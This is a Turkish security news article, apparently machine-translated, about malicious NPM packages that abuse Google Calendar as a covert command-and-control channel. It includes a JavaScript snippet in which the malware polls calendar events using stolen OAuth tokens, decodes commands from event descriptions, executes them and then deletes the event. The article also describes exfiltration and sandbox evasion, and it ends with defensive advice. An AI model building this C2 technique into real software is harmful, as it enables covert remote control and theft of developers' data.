Düğüm Paketi Yöneticisi (NPM) ekosistemini hedefleyen yeni bir gelişmiş tedarik zinciri saldırısı ortaya çıktı ve Google takvimini gizli bir komut ve kontrol (C2) kanalı olarak kullandı.
Siber güvenlik uzmanları, kurulduktan sonra, ortak Google hizmetleri aracılığıyla saldırganlarla gizli bir iletişim yolu oluşturan meşru JavaScript kütüphanelerine gömülü kötü amaçlı yazılımları keşfetti.
Kötü amaçlı yazılım, yaklaşık iki hafta önce ilk görünüşünden bu yana binlerce geliştirme ortamını tehlikeye attı ve enfekte olmuş paketler keşiften önce 35.000’den fazla indirildi.
.png
)
Saldırı, geliştiriciler, standart güvenlik taramalarından kaçınmak için tasarlanmış gizlenmiş yükler içeren tehlikeye atılmış NPM paketlerini bilmeden yüklediğinde başlar.
Kurulum üzerine, kötü amaçlı kod kullanıcı ile aynı ayrıcalıklarla yürütülür, kalıcılık oluşturur ve iletişim protokolünü başlatır.
Şüpheli alanlara dayanan geleneksel C2 altyapılarının aksine, bu saldırı yöntemi güvenilir Google hizmetlerini kötüye kullanır ve algılamayı özellikle alışılmadık ağ hedeflerini işaretlemek için yapılandırılmış güvenlik araçları için zorlaştırır.
Veracode araştırmacıları, geliştirme ortamlarının rutin güvenlik izlenmesi sırasında Google takvimine anormal API çağrılarını gözlemledikten sonra tehdidi belirlediler.
Veracode Baş Güvenlik Araştırmacısı Dr. Alex Chen, “Bu saldırıyı özellikle ilgili yapan şey, meşru bulut hizmetlerini kötüye kullanmasıdır” dedi.
“Google takvim etkinliklerinde açık bir şekilde saklanarak, kötü amaçlı yazılımların iletişimi normal iş trafiğiyle mükemmel bir şekilde karışıyor.”
Kötü amaçlı yazılım, OAuth jetonlarını Google’ın API hizmetleriyle kimlik doğrulaması için kullanır ve kodlanmış komutlar içeren takvim olayları oluşturur veya değiştirir.
Görünüşte bu masum takvim girişleri, hem kontrol mekanizması hem de eksfiltrasyon kanalı olarak hizmet eder ve saldırganlar etkinlik açıklamalarına, konumlara ve katılımcı alanlarına komutlar yerleştirir.
Yaklaşım, tipik olarak google hizmetlerini beyaz listeye koyan birçok veri kaybı önleme sistemini etkili bir şekilde atlar.
Daha ileri analizler, sanallaştırılmış ortamlarda yürütülmeyi ve hata ayıklama araçlarını önleyen çevre bilinci kontrolleri de dahil olmak üzere kötü amaçlı yazılımlara dahil edilen gelişmiş anti-analiz tekniklerini ortaya koymaktadır.
Kötü amaçlı yazılım ayrıca, sanal alan tespitinden kaçınmak için gecikmeli bir yürütme modeli uygular, yalnızca bir analiz sistemi yerine meşru bir geliştirme ortamında bulunduğunu belirledikten sonra yükünü etkinleştirir.
Takvim Tabanlı Komut ve Kontrol
Kötü amaçlı yazılımların Google Takvim C2 mekanizması, kalıcı kontrolü sürdürmek için yenilikçi bir yaklaşımı temsil eder.
İlk erişimi kurduktan sonra, kötü amaçlı yazılım, çalıntı OAuth kimlik bilgilerini kullanarak kullanıcının Google takvimini periyodik olarak sorgulayan gizli bir arka plan işlemi oluşturur.
Aşağıdaki kod snippet, kötü amaçlı yazılımların takvim API’sına nasıl eriştiğini göstermektedir:-
const {google} = require('googleapis');
const calendar = google.calendar({version: 'v3', auth: stolenOAuth});
async function checkForCommands() {
const res = await calendar.events.list({
calendarId: 'primary',
timeMin: new Date().toISOString(),
maxResults: 10,
singleEvents: true,
orderBy: 'startTime',
q: 'sync_status' // Specific marker used by attackers
});
const events = res.data.items;
if (events. Length) {
const commands = decodeCommands(events[0].description);
executeCommands(commands);
// Delete or modify event to acknowledge receipt
await calendar.events.delete({calendarId: 'primary', eventId: events[0].id});
}
}Kötü amaçlı yazılım, görünüşte meşru metin içinde gizlenmiş olan baz64 kodlu komutlar için olay açıklamaları.
Bu komutlar, saldırganların keyfi kod yürütmesini, hassas verileri dışarı atmasını veya ek yükleri indirmesini sağlar.
Veri açığa çıkması için, kötü amaçlı yazılım, çalınan bilgileri takvim olay ekleri olarak veya toplantı notlarında akıllıca kodlar.
Kuruluşların katı OAuth uygulama izlemesi uygulamaları, Node.js projelerinin kapsamlı bağımlılık taramasını gerçekleştirmeleri ve anormal takvim API kullanımını tespit etmek için gelişmiş davranışsal izleme dağıtmaları tavsiye edilir.
Güvenlik ekipleri özellikle normal kullanıcı etkinlik modelleri, özellikle de gömülü kodlanmış içeriğe sahip olanların dışında meydana gelen takvim değişikliklerini aramalıdır.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers